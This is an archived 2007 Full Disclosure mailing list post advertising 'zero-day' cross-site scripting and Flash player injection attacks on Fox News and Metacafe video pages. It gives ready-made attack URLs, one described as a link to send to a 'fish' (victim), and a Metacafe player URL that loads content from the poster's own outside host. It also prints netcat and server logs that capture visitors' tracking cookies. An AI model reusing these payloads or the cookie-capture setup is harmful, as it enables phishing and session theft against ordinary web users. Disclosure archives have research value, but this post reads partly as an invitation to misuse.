Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

0day Shockwave and Flash XSS Fish Exploits on Youtube, Revver, Metacafe, Google.
From: "XSS Worm XSS Security Information Portal" <cross-site-scripting-security () xssworm com>
Date: Sat, 10 Nov 2007 17:36:55 +1100

Foxnews 0day XSS Shock Attack
<http://www.foxnews.com/video2/launchPage.html?100207/100207_imag_PETITE&%253Ch1%253E%253Ca%2520href=//xssworm.com%253EXSS%2520Worm%2520Web%25202.0%2520Security%2520Portal%253C/a%253E%253Cbr%253E%253C/h1%253EWith%2520new%25200day%2520Fox%2520News%2520XSS%2520Hacking%2520Video!>
Demo link to send to a fish:

http://www.foxnews.com/video2/launchPage.html?http://localhost/

With netcat listen on localhost :

listening on [any] 80 ...
connect to localhost [127.0.0.1] from localhost [127.0.0.1] 1964
GET
/E05510/a3/0/3/1380/1/0/116282DDC64/0/0/00000000/312340660.gif?D=DM%5FLOC%3D
http%3A%2F%2Fwww%252Efoxnews%252Ecom%2Fvideo2%2FlaunchPage%252Ehtml%253Fhttp%3A%
2F%2Flocalhost%2526pageType%253Dmisc%2526miscPage%253DVideo%252520Launch%252520P
age%26DM%5FREF%3D%26DM%5FTIT%3DFOXNews%252Ecom%20%2D%20Video%20Launch%20Page%20%
2D%20FOXNews%252Ecom%26DM%5FEOM%3D1 HTTP/1.1
Host: pix01.revsci.net
User-Agent: Mozilla/5.0 (Mandriver)
Accept: image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.foxnews.com/video2/launchPage.html?http://localhost
*Cookie: NETID01=9mWO-Ar () 1RoAAAm1AWEAAAC5;
NETSEGS_J05532=960C7930BE970CE4&J05532
&3F149836&472757D9&0&&4723FE85&C2C6A1738F3B885FCA46DE74CFF355ED*


I think maybe this is to make many shock waves with XSS !
 Zero Day Shockwave SWF Player Exploit with XSS
Attack<http://xssworm.blogvis.com/12/xssworm/zero-day-shockwave-swf-player-exploit-with-xss-attack/>
in the hacking metacafe we discover Shockwave XSS 0day attack to use by
blackhat to steal fish:

MetaCafe XSS Worm Vulnerabilities - ZeroDay Shockwave Attack POC - :

http://www.metacafe.com/f/fvp/EmbedVideoPlayer_5.1.0.0.swf?itemID=755028&mediaURL=http://xssworm.com/?fish&normalizedTitle=space_trip&isViral=false&isWatermarked=false&postrollContentURL=http://l3images.metacafe.com/f/fvp/EmbedItemSelector_3.0.0.5.swf&networkingAllowed=true
&

We see this outputs in xssworm.com log - :


GET /crossdomain.xml HTTP/1.1
Host: metacafe.122.2o7.net
Cookie: s_vi_xxhybx7BxBxxclx7Fx7D=[CS]v4|472A0D2D00060B2-290B2900004DB|472A0
D2D[CE];
s_vihfex7Ekx7Dx7Fzxx=[CS]v4|47208A0C00004D74-A170C5400003A87|472DA4DB[
CE]; s_vi_jdghjlgdijg=[CS]v4|472605E00007606-A170BAE0000639DC|4726056DCE]
s_vi
_wzvqcdsx7F7×60qx7isx7Fx7D[CS]v4|.....

snips…

We see many more serious vulnerability in the web 2.0 today. As you must be
sure to visit http://xssworm.com/ security portal to discuss this shock
problem && many thanks for your reply. I am interested.

*vaj


-- 
Francesco Vaj [CISSP - GIAC]
CSS Security Researcher
mailto:vaj () nospam xssworm com
aim: XSS Cross Site
------
XSS Cross Site Scripting Attacks and
Web 2.0 AJAX Security Information News -
http://xssworm.com/
------
"Vaj, bella vaj."
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
  • 0day Shockwave and Flash XSS Fish Exploits on Youtube, Revver, Metacafe, Google. XSS Worm XSS Security Information Portal (Nov 10)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault